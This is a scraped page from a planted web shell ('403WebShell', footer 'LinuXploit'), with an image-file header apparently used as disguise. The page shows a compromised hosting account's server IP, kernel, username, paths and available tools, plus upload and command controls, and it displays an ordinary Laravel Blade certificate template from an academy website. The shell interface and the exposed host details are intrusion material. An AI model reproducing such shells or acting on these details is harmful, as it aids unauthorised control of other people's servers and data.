����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 3.148.217.16
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/bofirmacademy.com/resources/views/instructor/certificate/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/bofirmacademy.com/resources/views/instructor/certificate/pdf.blade.php
<!DOCTYPE html>
<html lang="en">
<head>
    <title>Certificate</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        *{
            box-sizing: border-box;
            margin: 0;
        }
    </style>
</head>
<body>
<div class="pdf-wrapper-box" style="padding: 10px; margin-top: 50px;">

    <div class="certificate-frame" style="background-image: url('{{public_path($certificate->image)}}'); background-size: 100% auto; background-repeat: no-repeat; background-position: center;">
        <div style="position: relative; font-family: 'Mongolian Baiti'; padding: 35px  0;">

            @if($certificate->show_number == 'yes')
            <p class="certificate-number" style=" position: relative; top: {{$certificate->number_y_position? : 10}}px; text-align: center; color: {{$certificate->number_font_color ? : '#363234'}};font-size: {{$certificate->number_font_size ? : 20}}px; ">{{$certificate->certificate_number}}</p>
            @endif

            <div class="certificate-title" style=" position: relative; top: {{$certificate_by_instructor->title_y_position? : 10}}px; text-align: center; font-size: {{$certificate_by_instructor->title_font_size}}px; font-weight: 400; color: {{$certificate_by_instructor->title_font_color ? : '#363234'}}">{{$certificate_by_instructor->title}}</div>

                @if($certificate->show_date == 'yes')
                    <div class="certificate-publish-date" style="padding-top: 40px; text-align: center; position: relative; top: {{$certificate->date_y_position? : 10}}px; font-size: {{$certificate->date_font_size? : 30}}px; font-weight: 400; color: {{$certificate->date_font_color? : '#363234'}}; padding-bottom: 16px">[Certificate Date]</div>
                @endif
                @if($certificate->show_student_name == 'yes')
            <div class="certificate-student-name" style="text-align: center; position: relative; top: {{$certificate->student_name_y_position? : 10}}px; font-size: {{$certificate->student_name_font_size? : 32}}px; font-weight: 400;  color: {{$certificate->student_name_font_color? : '#363234'}}; padding-bottom: 16px">[Student Name]</div>
                @endif
            <p class="certificate-content" style="padding-bottom: 24px; position: relative; top: {{$certificate_by_instructor->body_y_position? : 16}}px; text-align: center; padding-left: 128px; padding-right: 128px; color: {{$certificate_by_instructor->body_font_color? : '#363234'}}; font-size: {{$certificate_by_instructor->body_font_size? : 20}}px;">{{$certificate_by_instructor->body}}</p>

            <div style="padding-bottom: 11rem;">
                <div class="certificate-signature certificate-signature-1" style="padding-left: 140px; position: relative; bottom: 10px; float: left">
                    @if(!is_null($certificate_by_instructor->signature))
                        <div style="position: relative; top: 55px;">
                        <img src="{{public_path($certificate_by_instructor->signature)}}" alt="Signature 1">
                        </div>
                    @endif

                    <p style=" position: relative;  top: {{$certificate_by_instructor->role_2_y_position? : 20}}px; font-size: {{$certificate_by_instructor->role_2_font_size? : 18}}px; font-weight: 400; color: {{$certificate_by_instructor->role_2_font_color ? : '#363234'}}">{{$certificate->role_2_title}}</p>
                </div>
                <div class="certificate-signature certificate-signature-2" style="padding-right: 140px; position: relative; bottom: 10px; float: right">

                    <div style="position: relative; top: 55px;">
                        <img src="{{public_path($certificate->role_1_signature)}}" alt="Signature 2">
                    </div>
                    <p style=" position: relative;  top: {{$certificate->role_1_y_position? : 20}}px; font-size: {{$certificate->role_1_font_size? : 18}}px; font-weight: 400; color: {{$certificate->role_1_font_color ? : '#363234'}}">{{$certificate->role_1_title}}</p>
                </div>
            </div>
        </div>
    </div>

</div>

<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit